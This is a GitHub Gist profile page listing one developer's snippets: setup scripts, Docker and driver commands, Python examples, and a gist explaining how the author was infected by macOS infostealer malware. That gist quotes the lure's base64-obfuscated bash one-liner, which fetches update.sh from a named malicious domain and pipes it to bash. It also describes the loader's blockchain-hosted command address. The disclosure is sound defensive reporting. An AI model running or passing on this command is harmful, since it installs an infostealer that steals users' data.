Skip to content

Instantly share code, notes, and snippets.

View fordnox's full-sized avatar
:electron:
Combobulating

Andrius Putna fordnox

:electron:
Combobulating
View GitHub Profile
@fordnox
fordnox / laya.sh
Last active September 21, 2026 23:41
Laya on Mac m4 CoreML Offline https://github.com/mizorewww/laya-coreml
mkdir test-laya
cd test-laya
uv init
uv add 'laya-coreml[demo]'
hf download aac6fef/laya-multilingual-coreml-ane --local-dir models/snake
uv run laya-coreml-snake --model models/snake
@fordnox
fordnox / explanation.md
Last active July 27, 2026 00:51
malware i got infected with

How I got infected

By being curious. I actually followed the instructions and pasted (cmd+v) into the terminal. The website had already put command in my clipboard. I did not save the actual command but it was something like bash <<< $(echo "Y3VybCAtcyAnaHR0cHM6Ly9jYXB1LmNpdHJpeGFwcHNwcm92aWRlbmNlLm9yZy91cGRhdGUuc2gnIHwgYmFzaA==" | base64 -d) where the base64 content was this url https://capu.citrixappsprovidence.org/update.sh

I have saved the script and turned of the WiFi. Then reinstalled Mac.

What it is

A macOS infostealer loader using the "EtherHiding" technique — the command-and-control address is stored in a blockchain smart contract instead of hardcoded, so it can't be taken down or blocklisted.

@fordnox
fordnox / up.sh
Created July 21, 2026 15:54
up.sh
rm -rf node_modules && ncu -u && pnpm i
@fordnox
fordnox / docker-compose.yml
Last active November 16, 2024 16:22
dokploy service under google auth
services:
traefik-forward-auth:
image: thomseddon/traefik-forward-auth:2
environment:
- PROVIDERS_GOOGLE_CLIENT_ID=
- PROVIDERS_GOOGLE_CLIENT_SECRET=
- SECRET=
- INSECURE_COOKIE=false
labels:
- traefik.enable=true
@fordnox
fordnox / pow.py
Last active November 9, 2024 11:47
simplified proof of work explanation. demonstrates the fundamental idea: a participant must perform repeated computations until they find a solution that satisfies a specified condition.
import base64, hashlib, os
print('Searching for a key with valid hash. Hold tight, this might take a minute...')
threshold = 2 ** 234
attempts = 0
while True:
attempts += 1
seed = os.urandom(50)
h = int.from_bytes(hashlib.sha256(seed).digest(), 'big')
if attempts % 100_000 == 0:
@fordnox
fordnox / async_loop.py
Created November 8, 2024 11:54
python async loop shutdown
import asyncio
import signal
async def hourly_task():
try:
while True:
print("Running hourly task")
await asyncio.sleep(3) # Sleep for 1 hour
except asyncio.CancelledError:
print("Hourly task canceled")
@fordnox
fordnox / drivers.sh
Last active April 21, 2026 14:07
Ubuntu 24.04 and GeForce RTX 4060 Ti 16GB drivers installation
sudo apt update && sudo apt upgrade;
sudo apt autoremove nvidia* --purge;
ubuntu-drivers devices;
sudo apt-get install linux-headers-$(uname -r) build-essential;
# reboot
sudo apt install nvidia-cuda-toolkit;
lspci | grep -i nvidia;
sudo apt install nvidia-driver-550;
sudo apt update && sudo apt upgrade;
# reboot
@fordnox
fordnox / Makefile
Created November 1, 2023 11:31
Random echo between 2 values in Makefile
#!make
run:
@if [ $$(($$RANDOM % 2)) -eq 0 ]; then \
echo 1; \
else \
echo 2; \
fi
@fordnox
fordnox / makefile
Last active October 31, 2024 09:53
clean all docker shit makefile target
clean:
docker stop $$(docker ps -aq) || true
docker rm $$(docker ps -aq) || true
docker container prune -f || true
docker rmi $$(docker images -q) || true
docker image prune -f || true
docker volume rm $$(docker volume ls -q) || true
docker-prune: ## Remove all unused containers, networks, images (both dangling and unreferenced), and optionally, volumes.
docker container prune -f
@fordnox
fordnox / convert-md-html.sh
Created June 30, 2023 07:35
Convert all folder markdown files to html
find ./content -name '*.md' | xargs -n 1 bash -c 'pandoc -f markdown -t html -o "${1/.md/.htm}" "${1}"' -
find ./content -name '*.md' -exec rm {} \;